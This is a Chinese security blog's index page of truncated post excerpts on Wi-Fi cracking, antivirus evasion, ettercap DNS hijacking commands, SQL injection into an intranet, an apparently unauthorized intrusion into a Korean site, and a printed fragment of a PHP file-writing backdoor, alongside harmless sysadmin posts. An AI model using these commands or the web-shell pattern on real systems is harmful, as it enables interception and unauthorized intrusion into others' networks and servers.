Ubuntu下破解WIFI密码
在北京租得房子嘛,最近不知道为啥没网了,但是刚过完年 房东还没回北京呢,于是打算学以致用,本机反正是Ubuntu,而且去年9月来北京的时候也带了无线网卡,那就破解一下吧!!这里先把步骤和关键的地方记录一下,文章等我破解完了再发出来!!(如果发现这篇文章不见了,不要紧,那就是我没破解成功,哈哈哈哈哈哈哈)破解步骤1.开启网卡monitor模式ifconfig wlan1 down iwconfig wlan1 mode monitor ifconfig wlan1 up2.扫描附近wi......

我是如何逃过所有杀软进行内网端口转发的
平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。常见的端口转发lcx.exenc.exeUsing php/jsp/aspx Scriptiptables端口转发nginx端口转发等等......其中lcx.exe、nc.exe以及使用脚本转发,都有可能被防护/杀毒软件拦截,而后者则略微有点麻烦(不会告诉你是因为我真懒!)我是一个非常喜欢渗透测试的人,并且颜值比较高(啊,打我干啥!)偶尔也会用到内网渗透,进行端口转发什么的,但时长会遇到XX狗,XX......

如何去除数据表中的重复数据
通常情况下,一个我们在做一个产品的时候,一开始可能由于设计考虑不周或者程序写的不够严谨,某个字段上的值产生重复了,但是又必须去掉,这个时候就稍微麻烦了一点,直接加一个 UNIQUE KEY 肯定是不行了,因为会报错。 现在,我们来采用一种变通的办法,不过可能会丢失一些数据 :)在这里,我们设定一个表,其结构如下:mysql> desc `user`; +-------+------------------+------+-----+---------+-------------......

骗子聪明还是你蠢:数据泄露跟被骗有什么联系?
引子最近某邮箱泄露事件闹得沸沸扬扬,随后各种自媒体,各种论坛、QQ群都炸开了锅,各种文章也是层出不穷的,然而我看到的最多的即是有关于底下黑色产业链的解释,讲的很详细,从第一次泄露到被利用再到第二次泄露。可能很多人觉得自己远离网络的喧嚣黑产就和你没有半毛钱关系?那你就大错特错了,在当下这个混乱的互联网社会中,你根本身不由己,就是因为你生活在这个社会中,所以有奇怪的人打你电话,知道你的名字,你的工作单位,知道你的所有隐私,都不再奇怪。这难道不可怕吗?案例小黑是一个喜欢网络安全的大学生,在......

Ubuntu下ettercap进行DNS内网DNS劫持
0x01 安装ettercapctrl+alt+T打开命令行,输入:sudo apt-get install ettercap 0x02 修改配置文件sudo vim /etc/ettercap/etter.dns 在最后一行加入:*.com A 192.168.1.1 *.cn A 192.168.1.1 IP地址是要把IP解析到的IP0x03 开始DNS劫持ettercap -T -i wlan0 -q -P dns_spoof /// /// -T文本模式 -i接要欺骗的适配器......

和柠檬草叔叔的泪奔史:从注入到内网漫游
作者:王松_Striker && 柠檬草邮箱:song@secbox.cn团队:安全盒子团队前言注入点是jcms的一个注入点,然后进行注入获取密码以后,安全核心核心成员wefgod对密码进行了逆向(在此感谢wefgod大神),但是登陆后台提示密码错误,各种无解,最终发现注入点可以执行命令,自己鼓捣了很久无果,于是拉上草叔叔,就有了下文,非常精彩的一个过程。0x01撕开内网入口松叔叔给我发了一个sa权限的注入点。条件是:库站分离。ps:也是比较蛋疼的,sqlmap的回显比较慢,虽然可以......

笔记本安装Ubuntu及渗透工具折腾笔记
作者:王松_Striker邮箱:song@secbox.cn团队:安全盒子团队本文是博主在安装ubuntu之后的一系列操作,其中涵盖:ubuntu安装、更换软件源、安装搜狗输入法、安装WineQQ、安装Nmap、安装SqlMap、安装metasploit、安装Nessus、安装burpsuite、安装OWASP ZAP、安装DirBuster等等,欢迎各位交流。Ubuntu安装方法首先去Ubuntu官方下载镜像,或者去国内的源下载也是可以的。然后用WinDiskImager写入到U盘......

抗韩之路:记渗透某韩国网站的过程
作者:王松_Striker邮箱:song@secbox.cn团队:安全盒子团队许久没有上(ri)过网(zhan)了,前几天朋友给我发来一个棒子站大概看了一下,基本环境是:PHP+MYSQL+Apache,大小写切换了一下,把最后的php换成phP,得知系统为Linux随便点了几个链接,发现必须登陆才能访问, 会提示无法访问然后跳到登陆页面, 简单测试了一下,发现登录框存在注入 得知表前缀为:g4_ 字段前缀是mb_ 注入了一会儿发现尼玛这条语句没有带入where mb_passwo......

利用Nginx实现简易负载均衡
作者:王松_Striker邮箱:song@secbox.cn团队:安全盒子团队基本思路如下:比如我们有三个服务器:其中:130.251是反向代理转发服务器130.251和130.238分别是负载服务器Mysql服务器没有标出来,为方便区分,我们先把1号负载的首页写成1111111112号负载的首页写成222222然后我们现在控制130.251, 把nginx配置文件里面原本的server{}全部删掉, 在http{}里面加上:Upstream myweb1{ #定义地址池 Serve......

分享一款遇到的PHP后门
这个后门是我在渗透某站时遇到的代码<?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST["z2"]; $buf = ""; for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2......


© 2019 Tuuu Nya's Blog . 由 Typecho 强力驱动 | Theme By Jimmy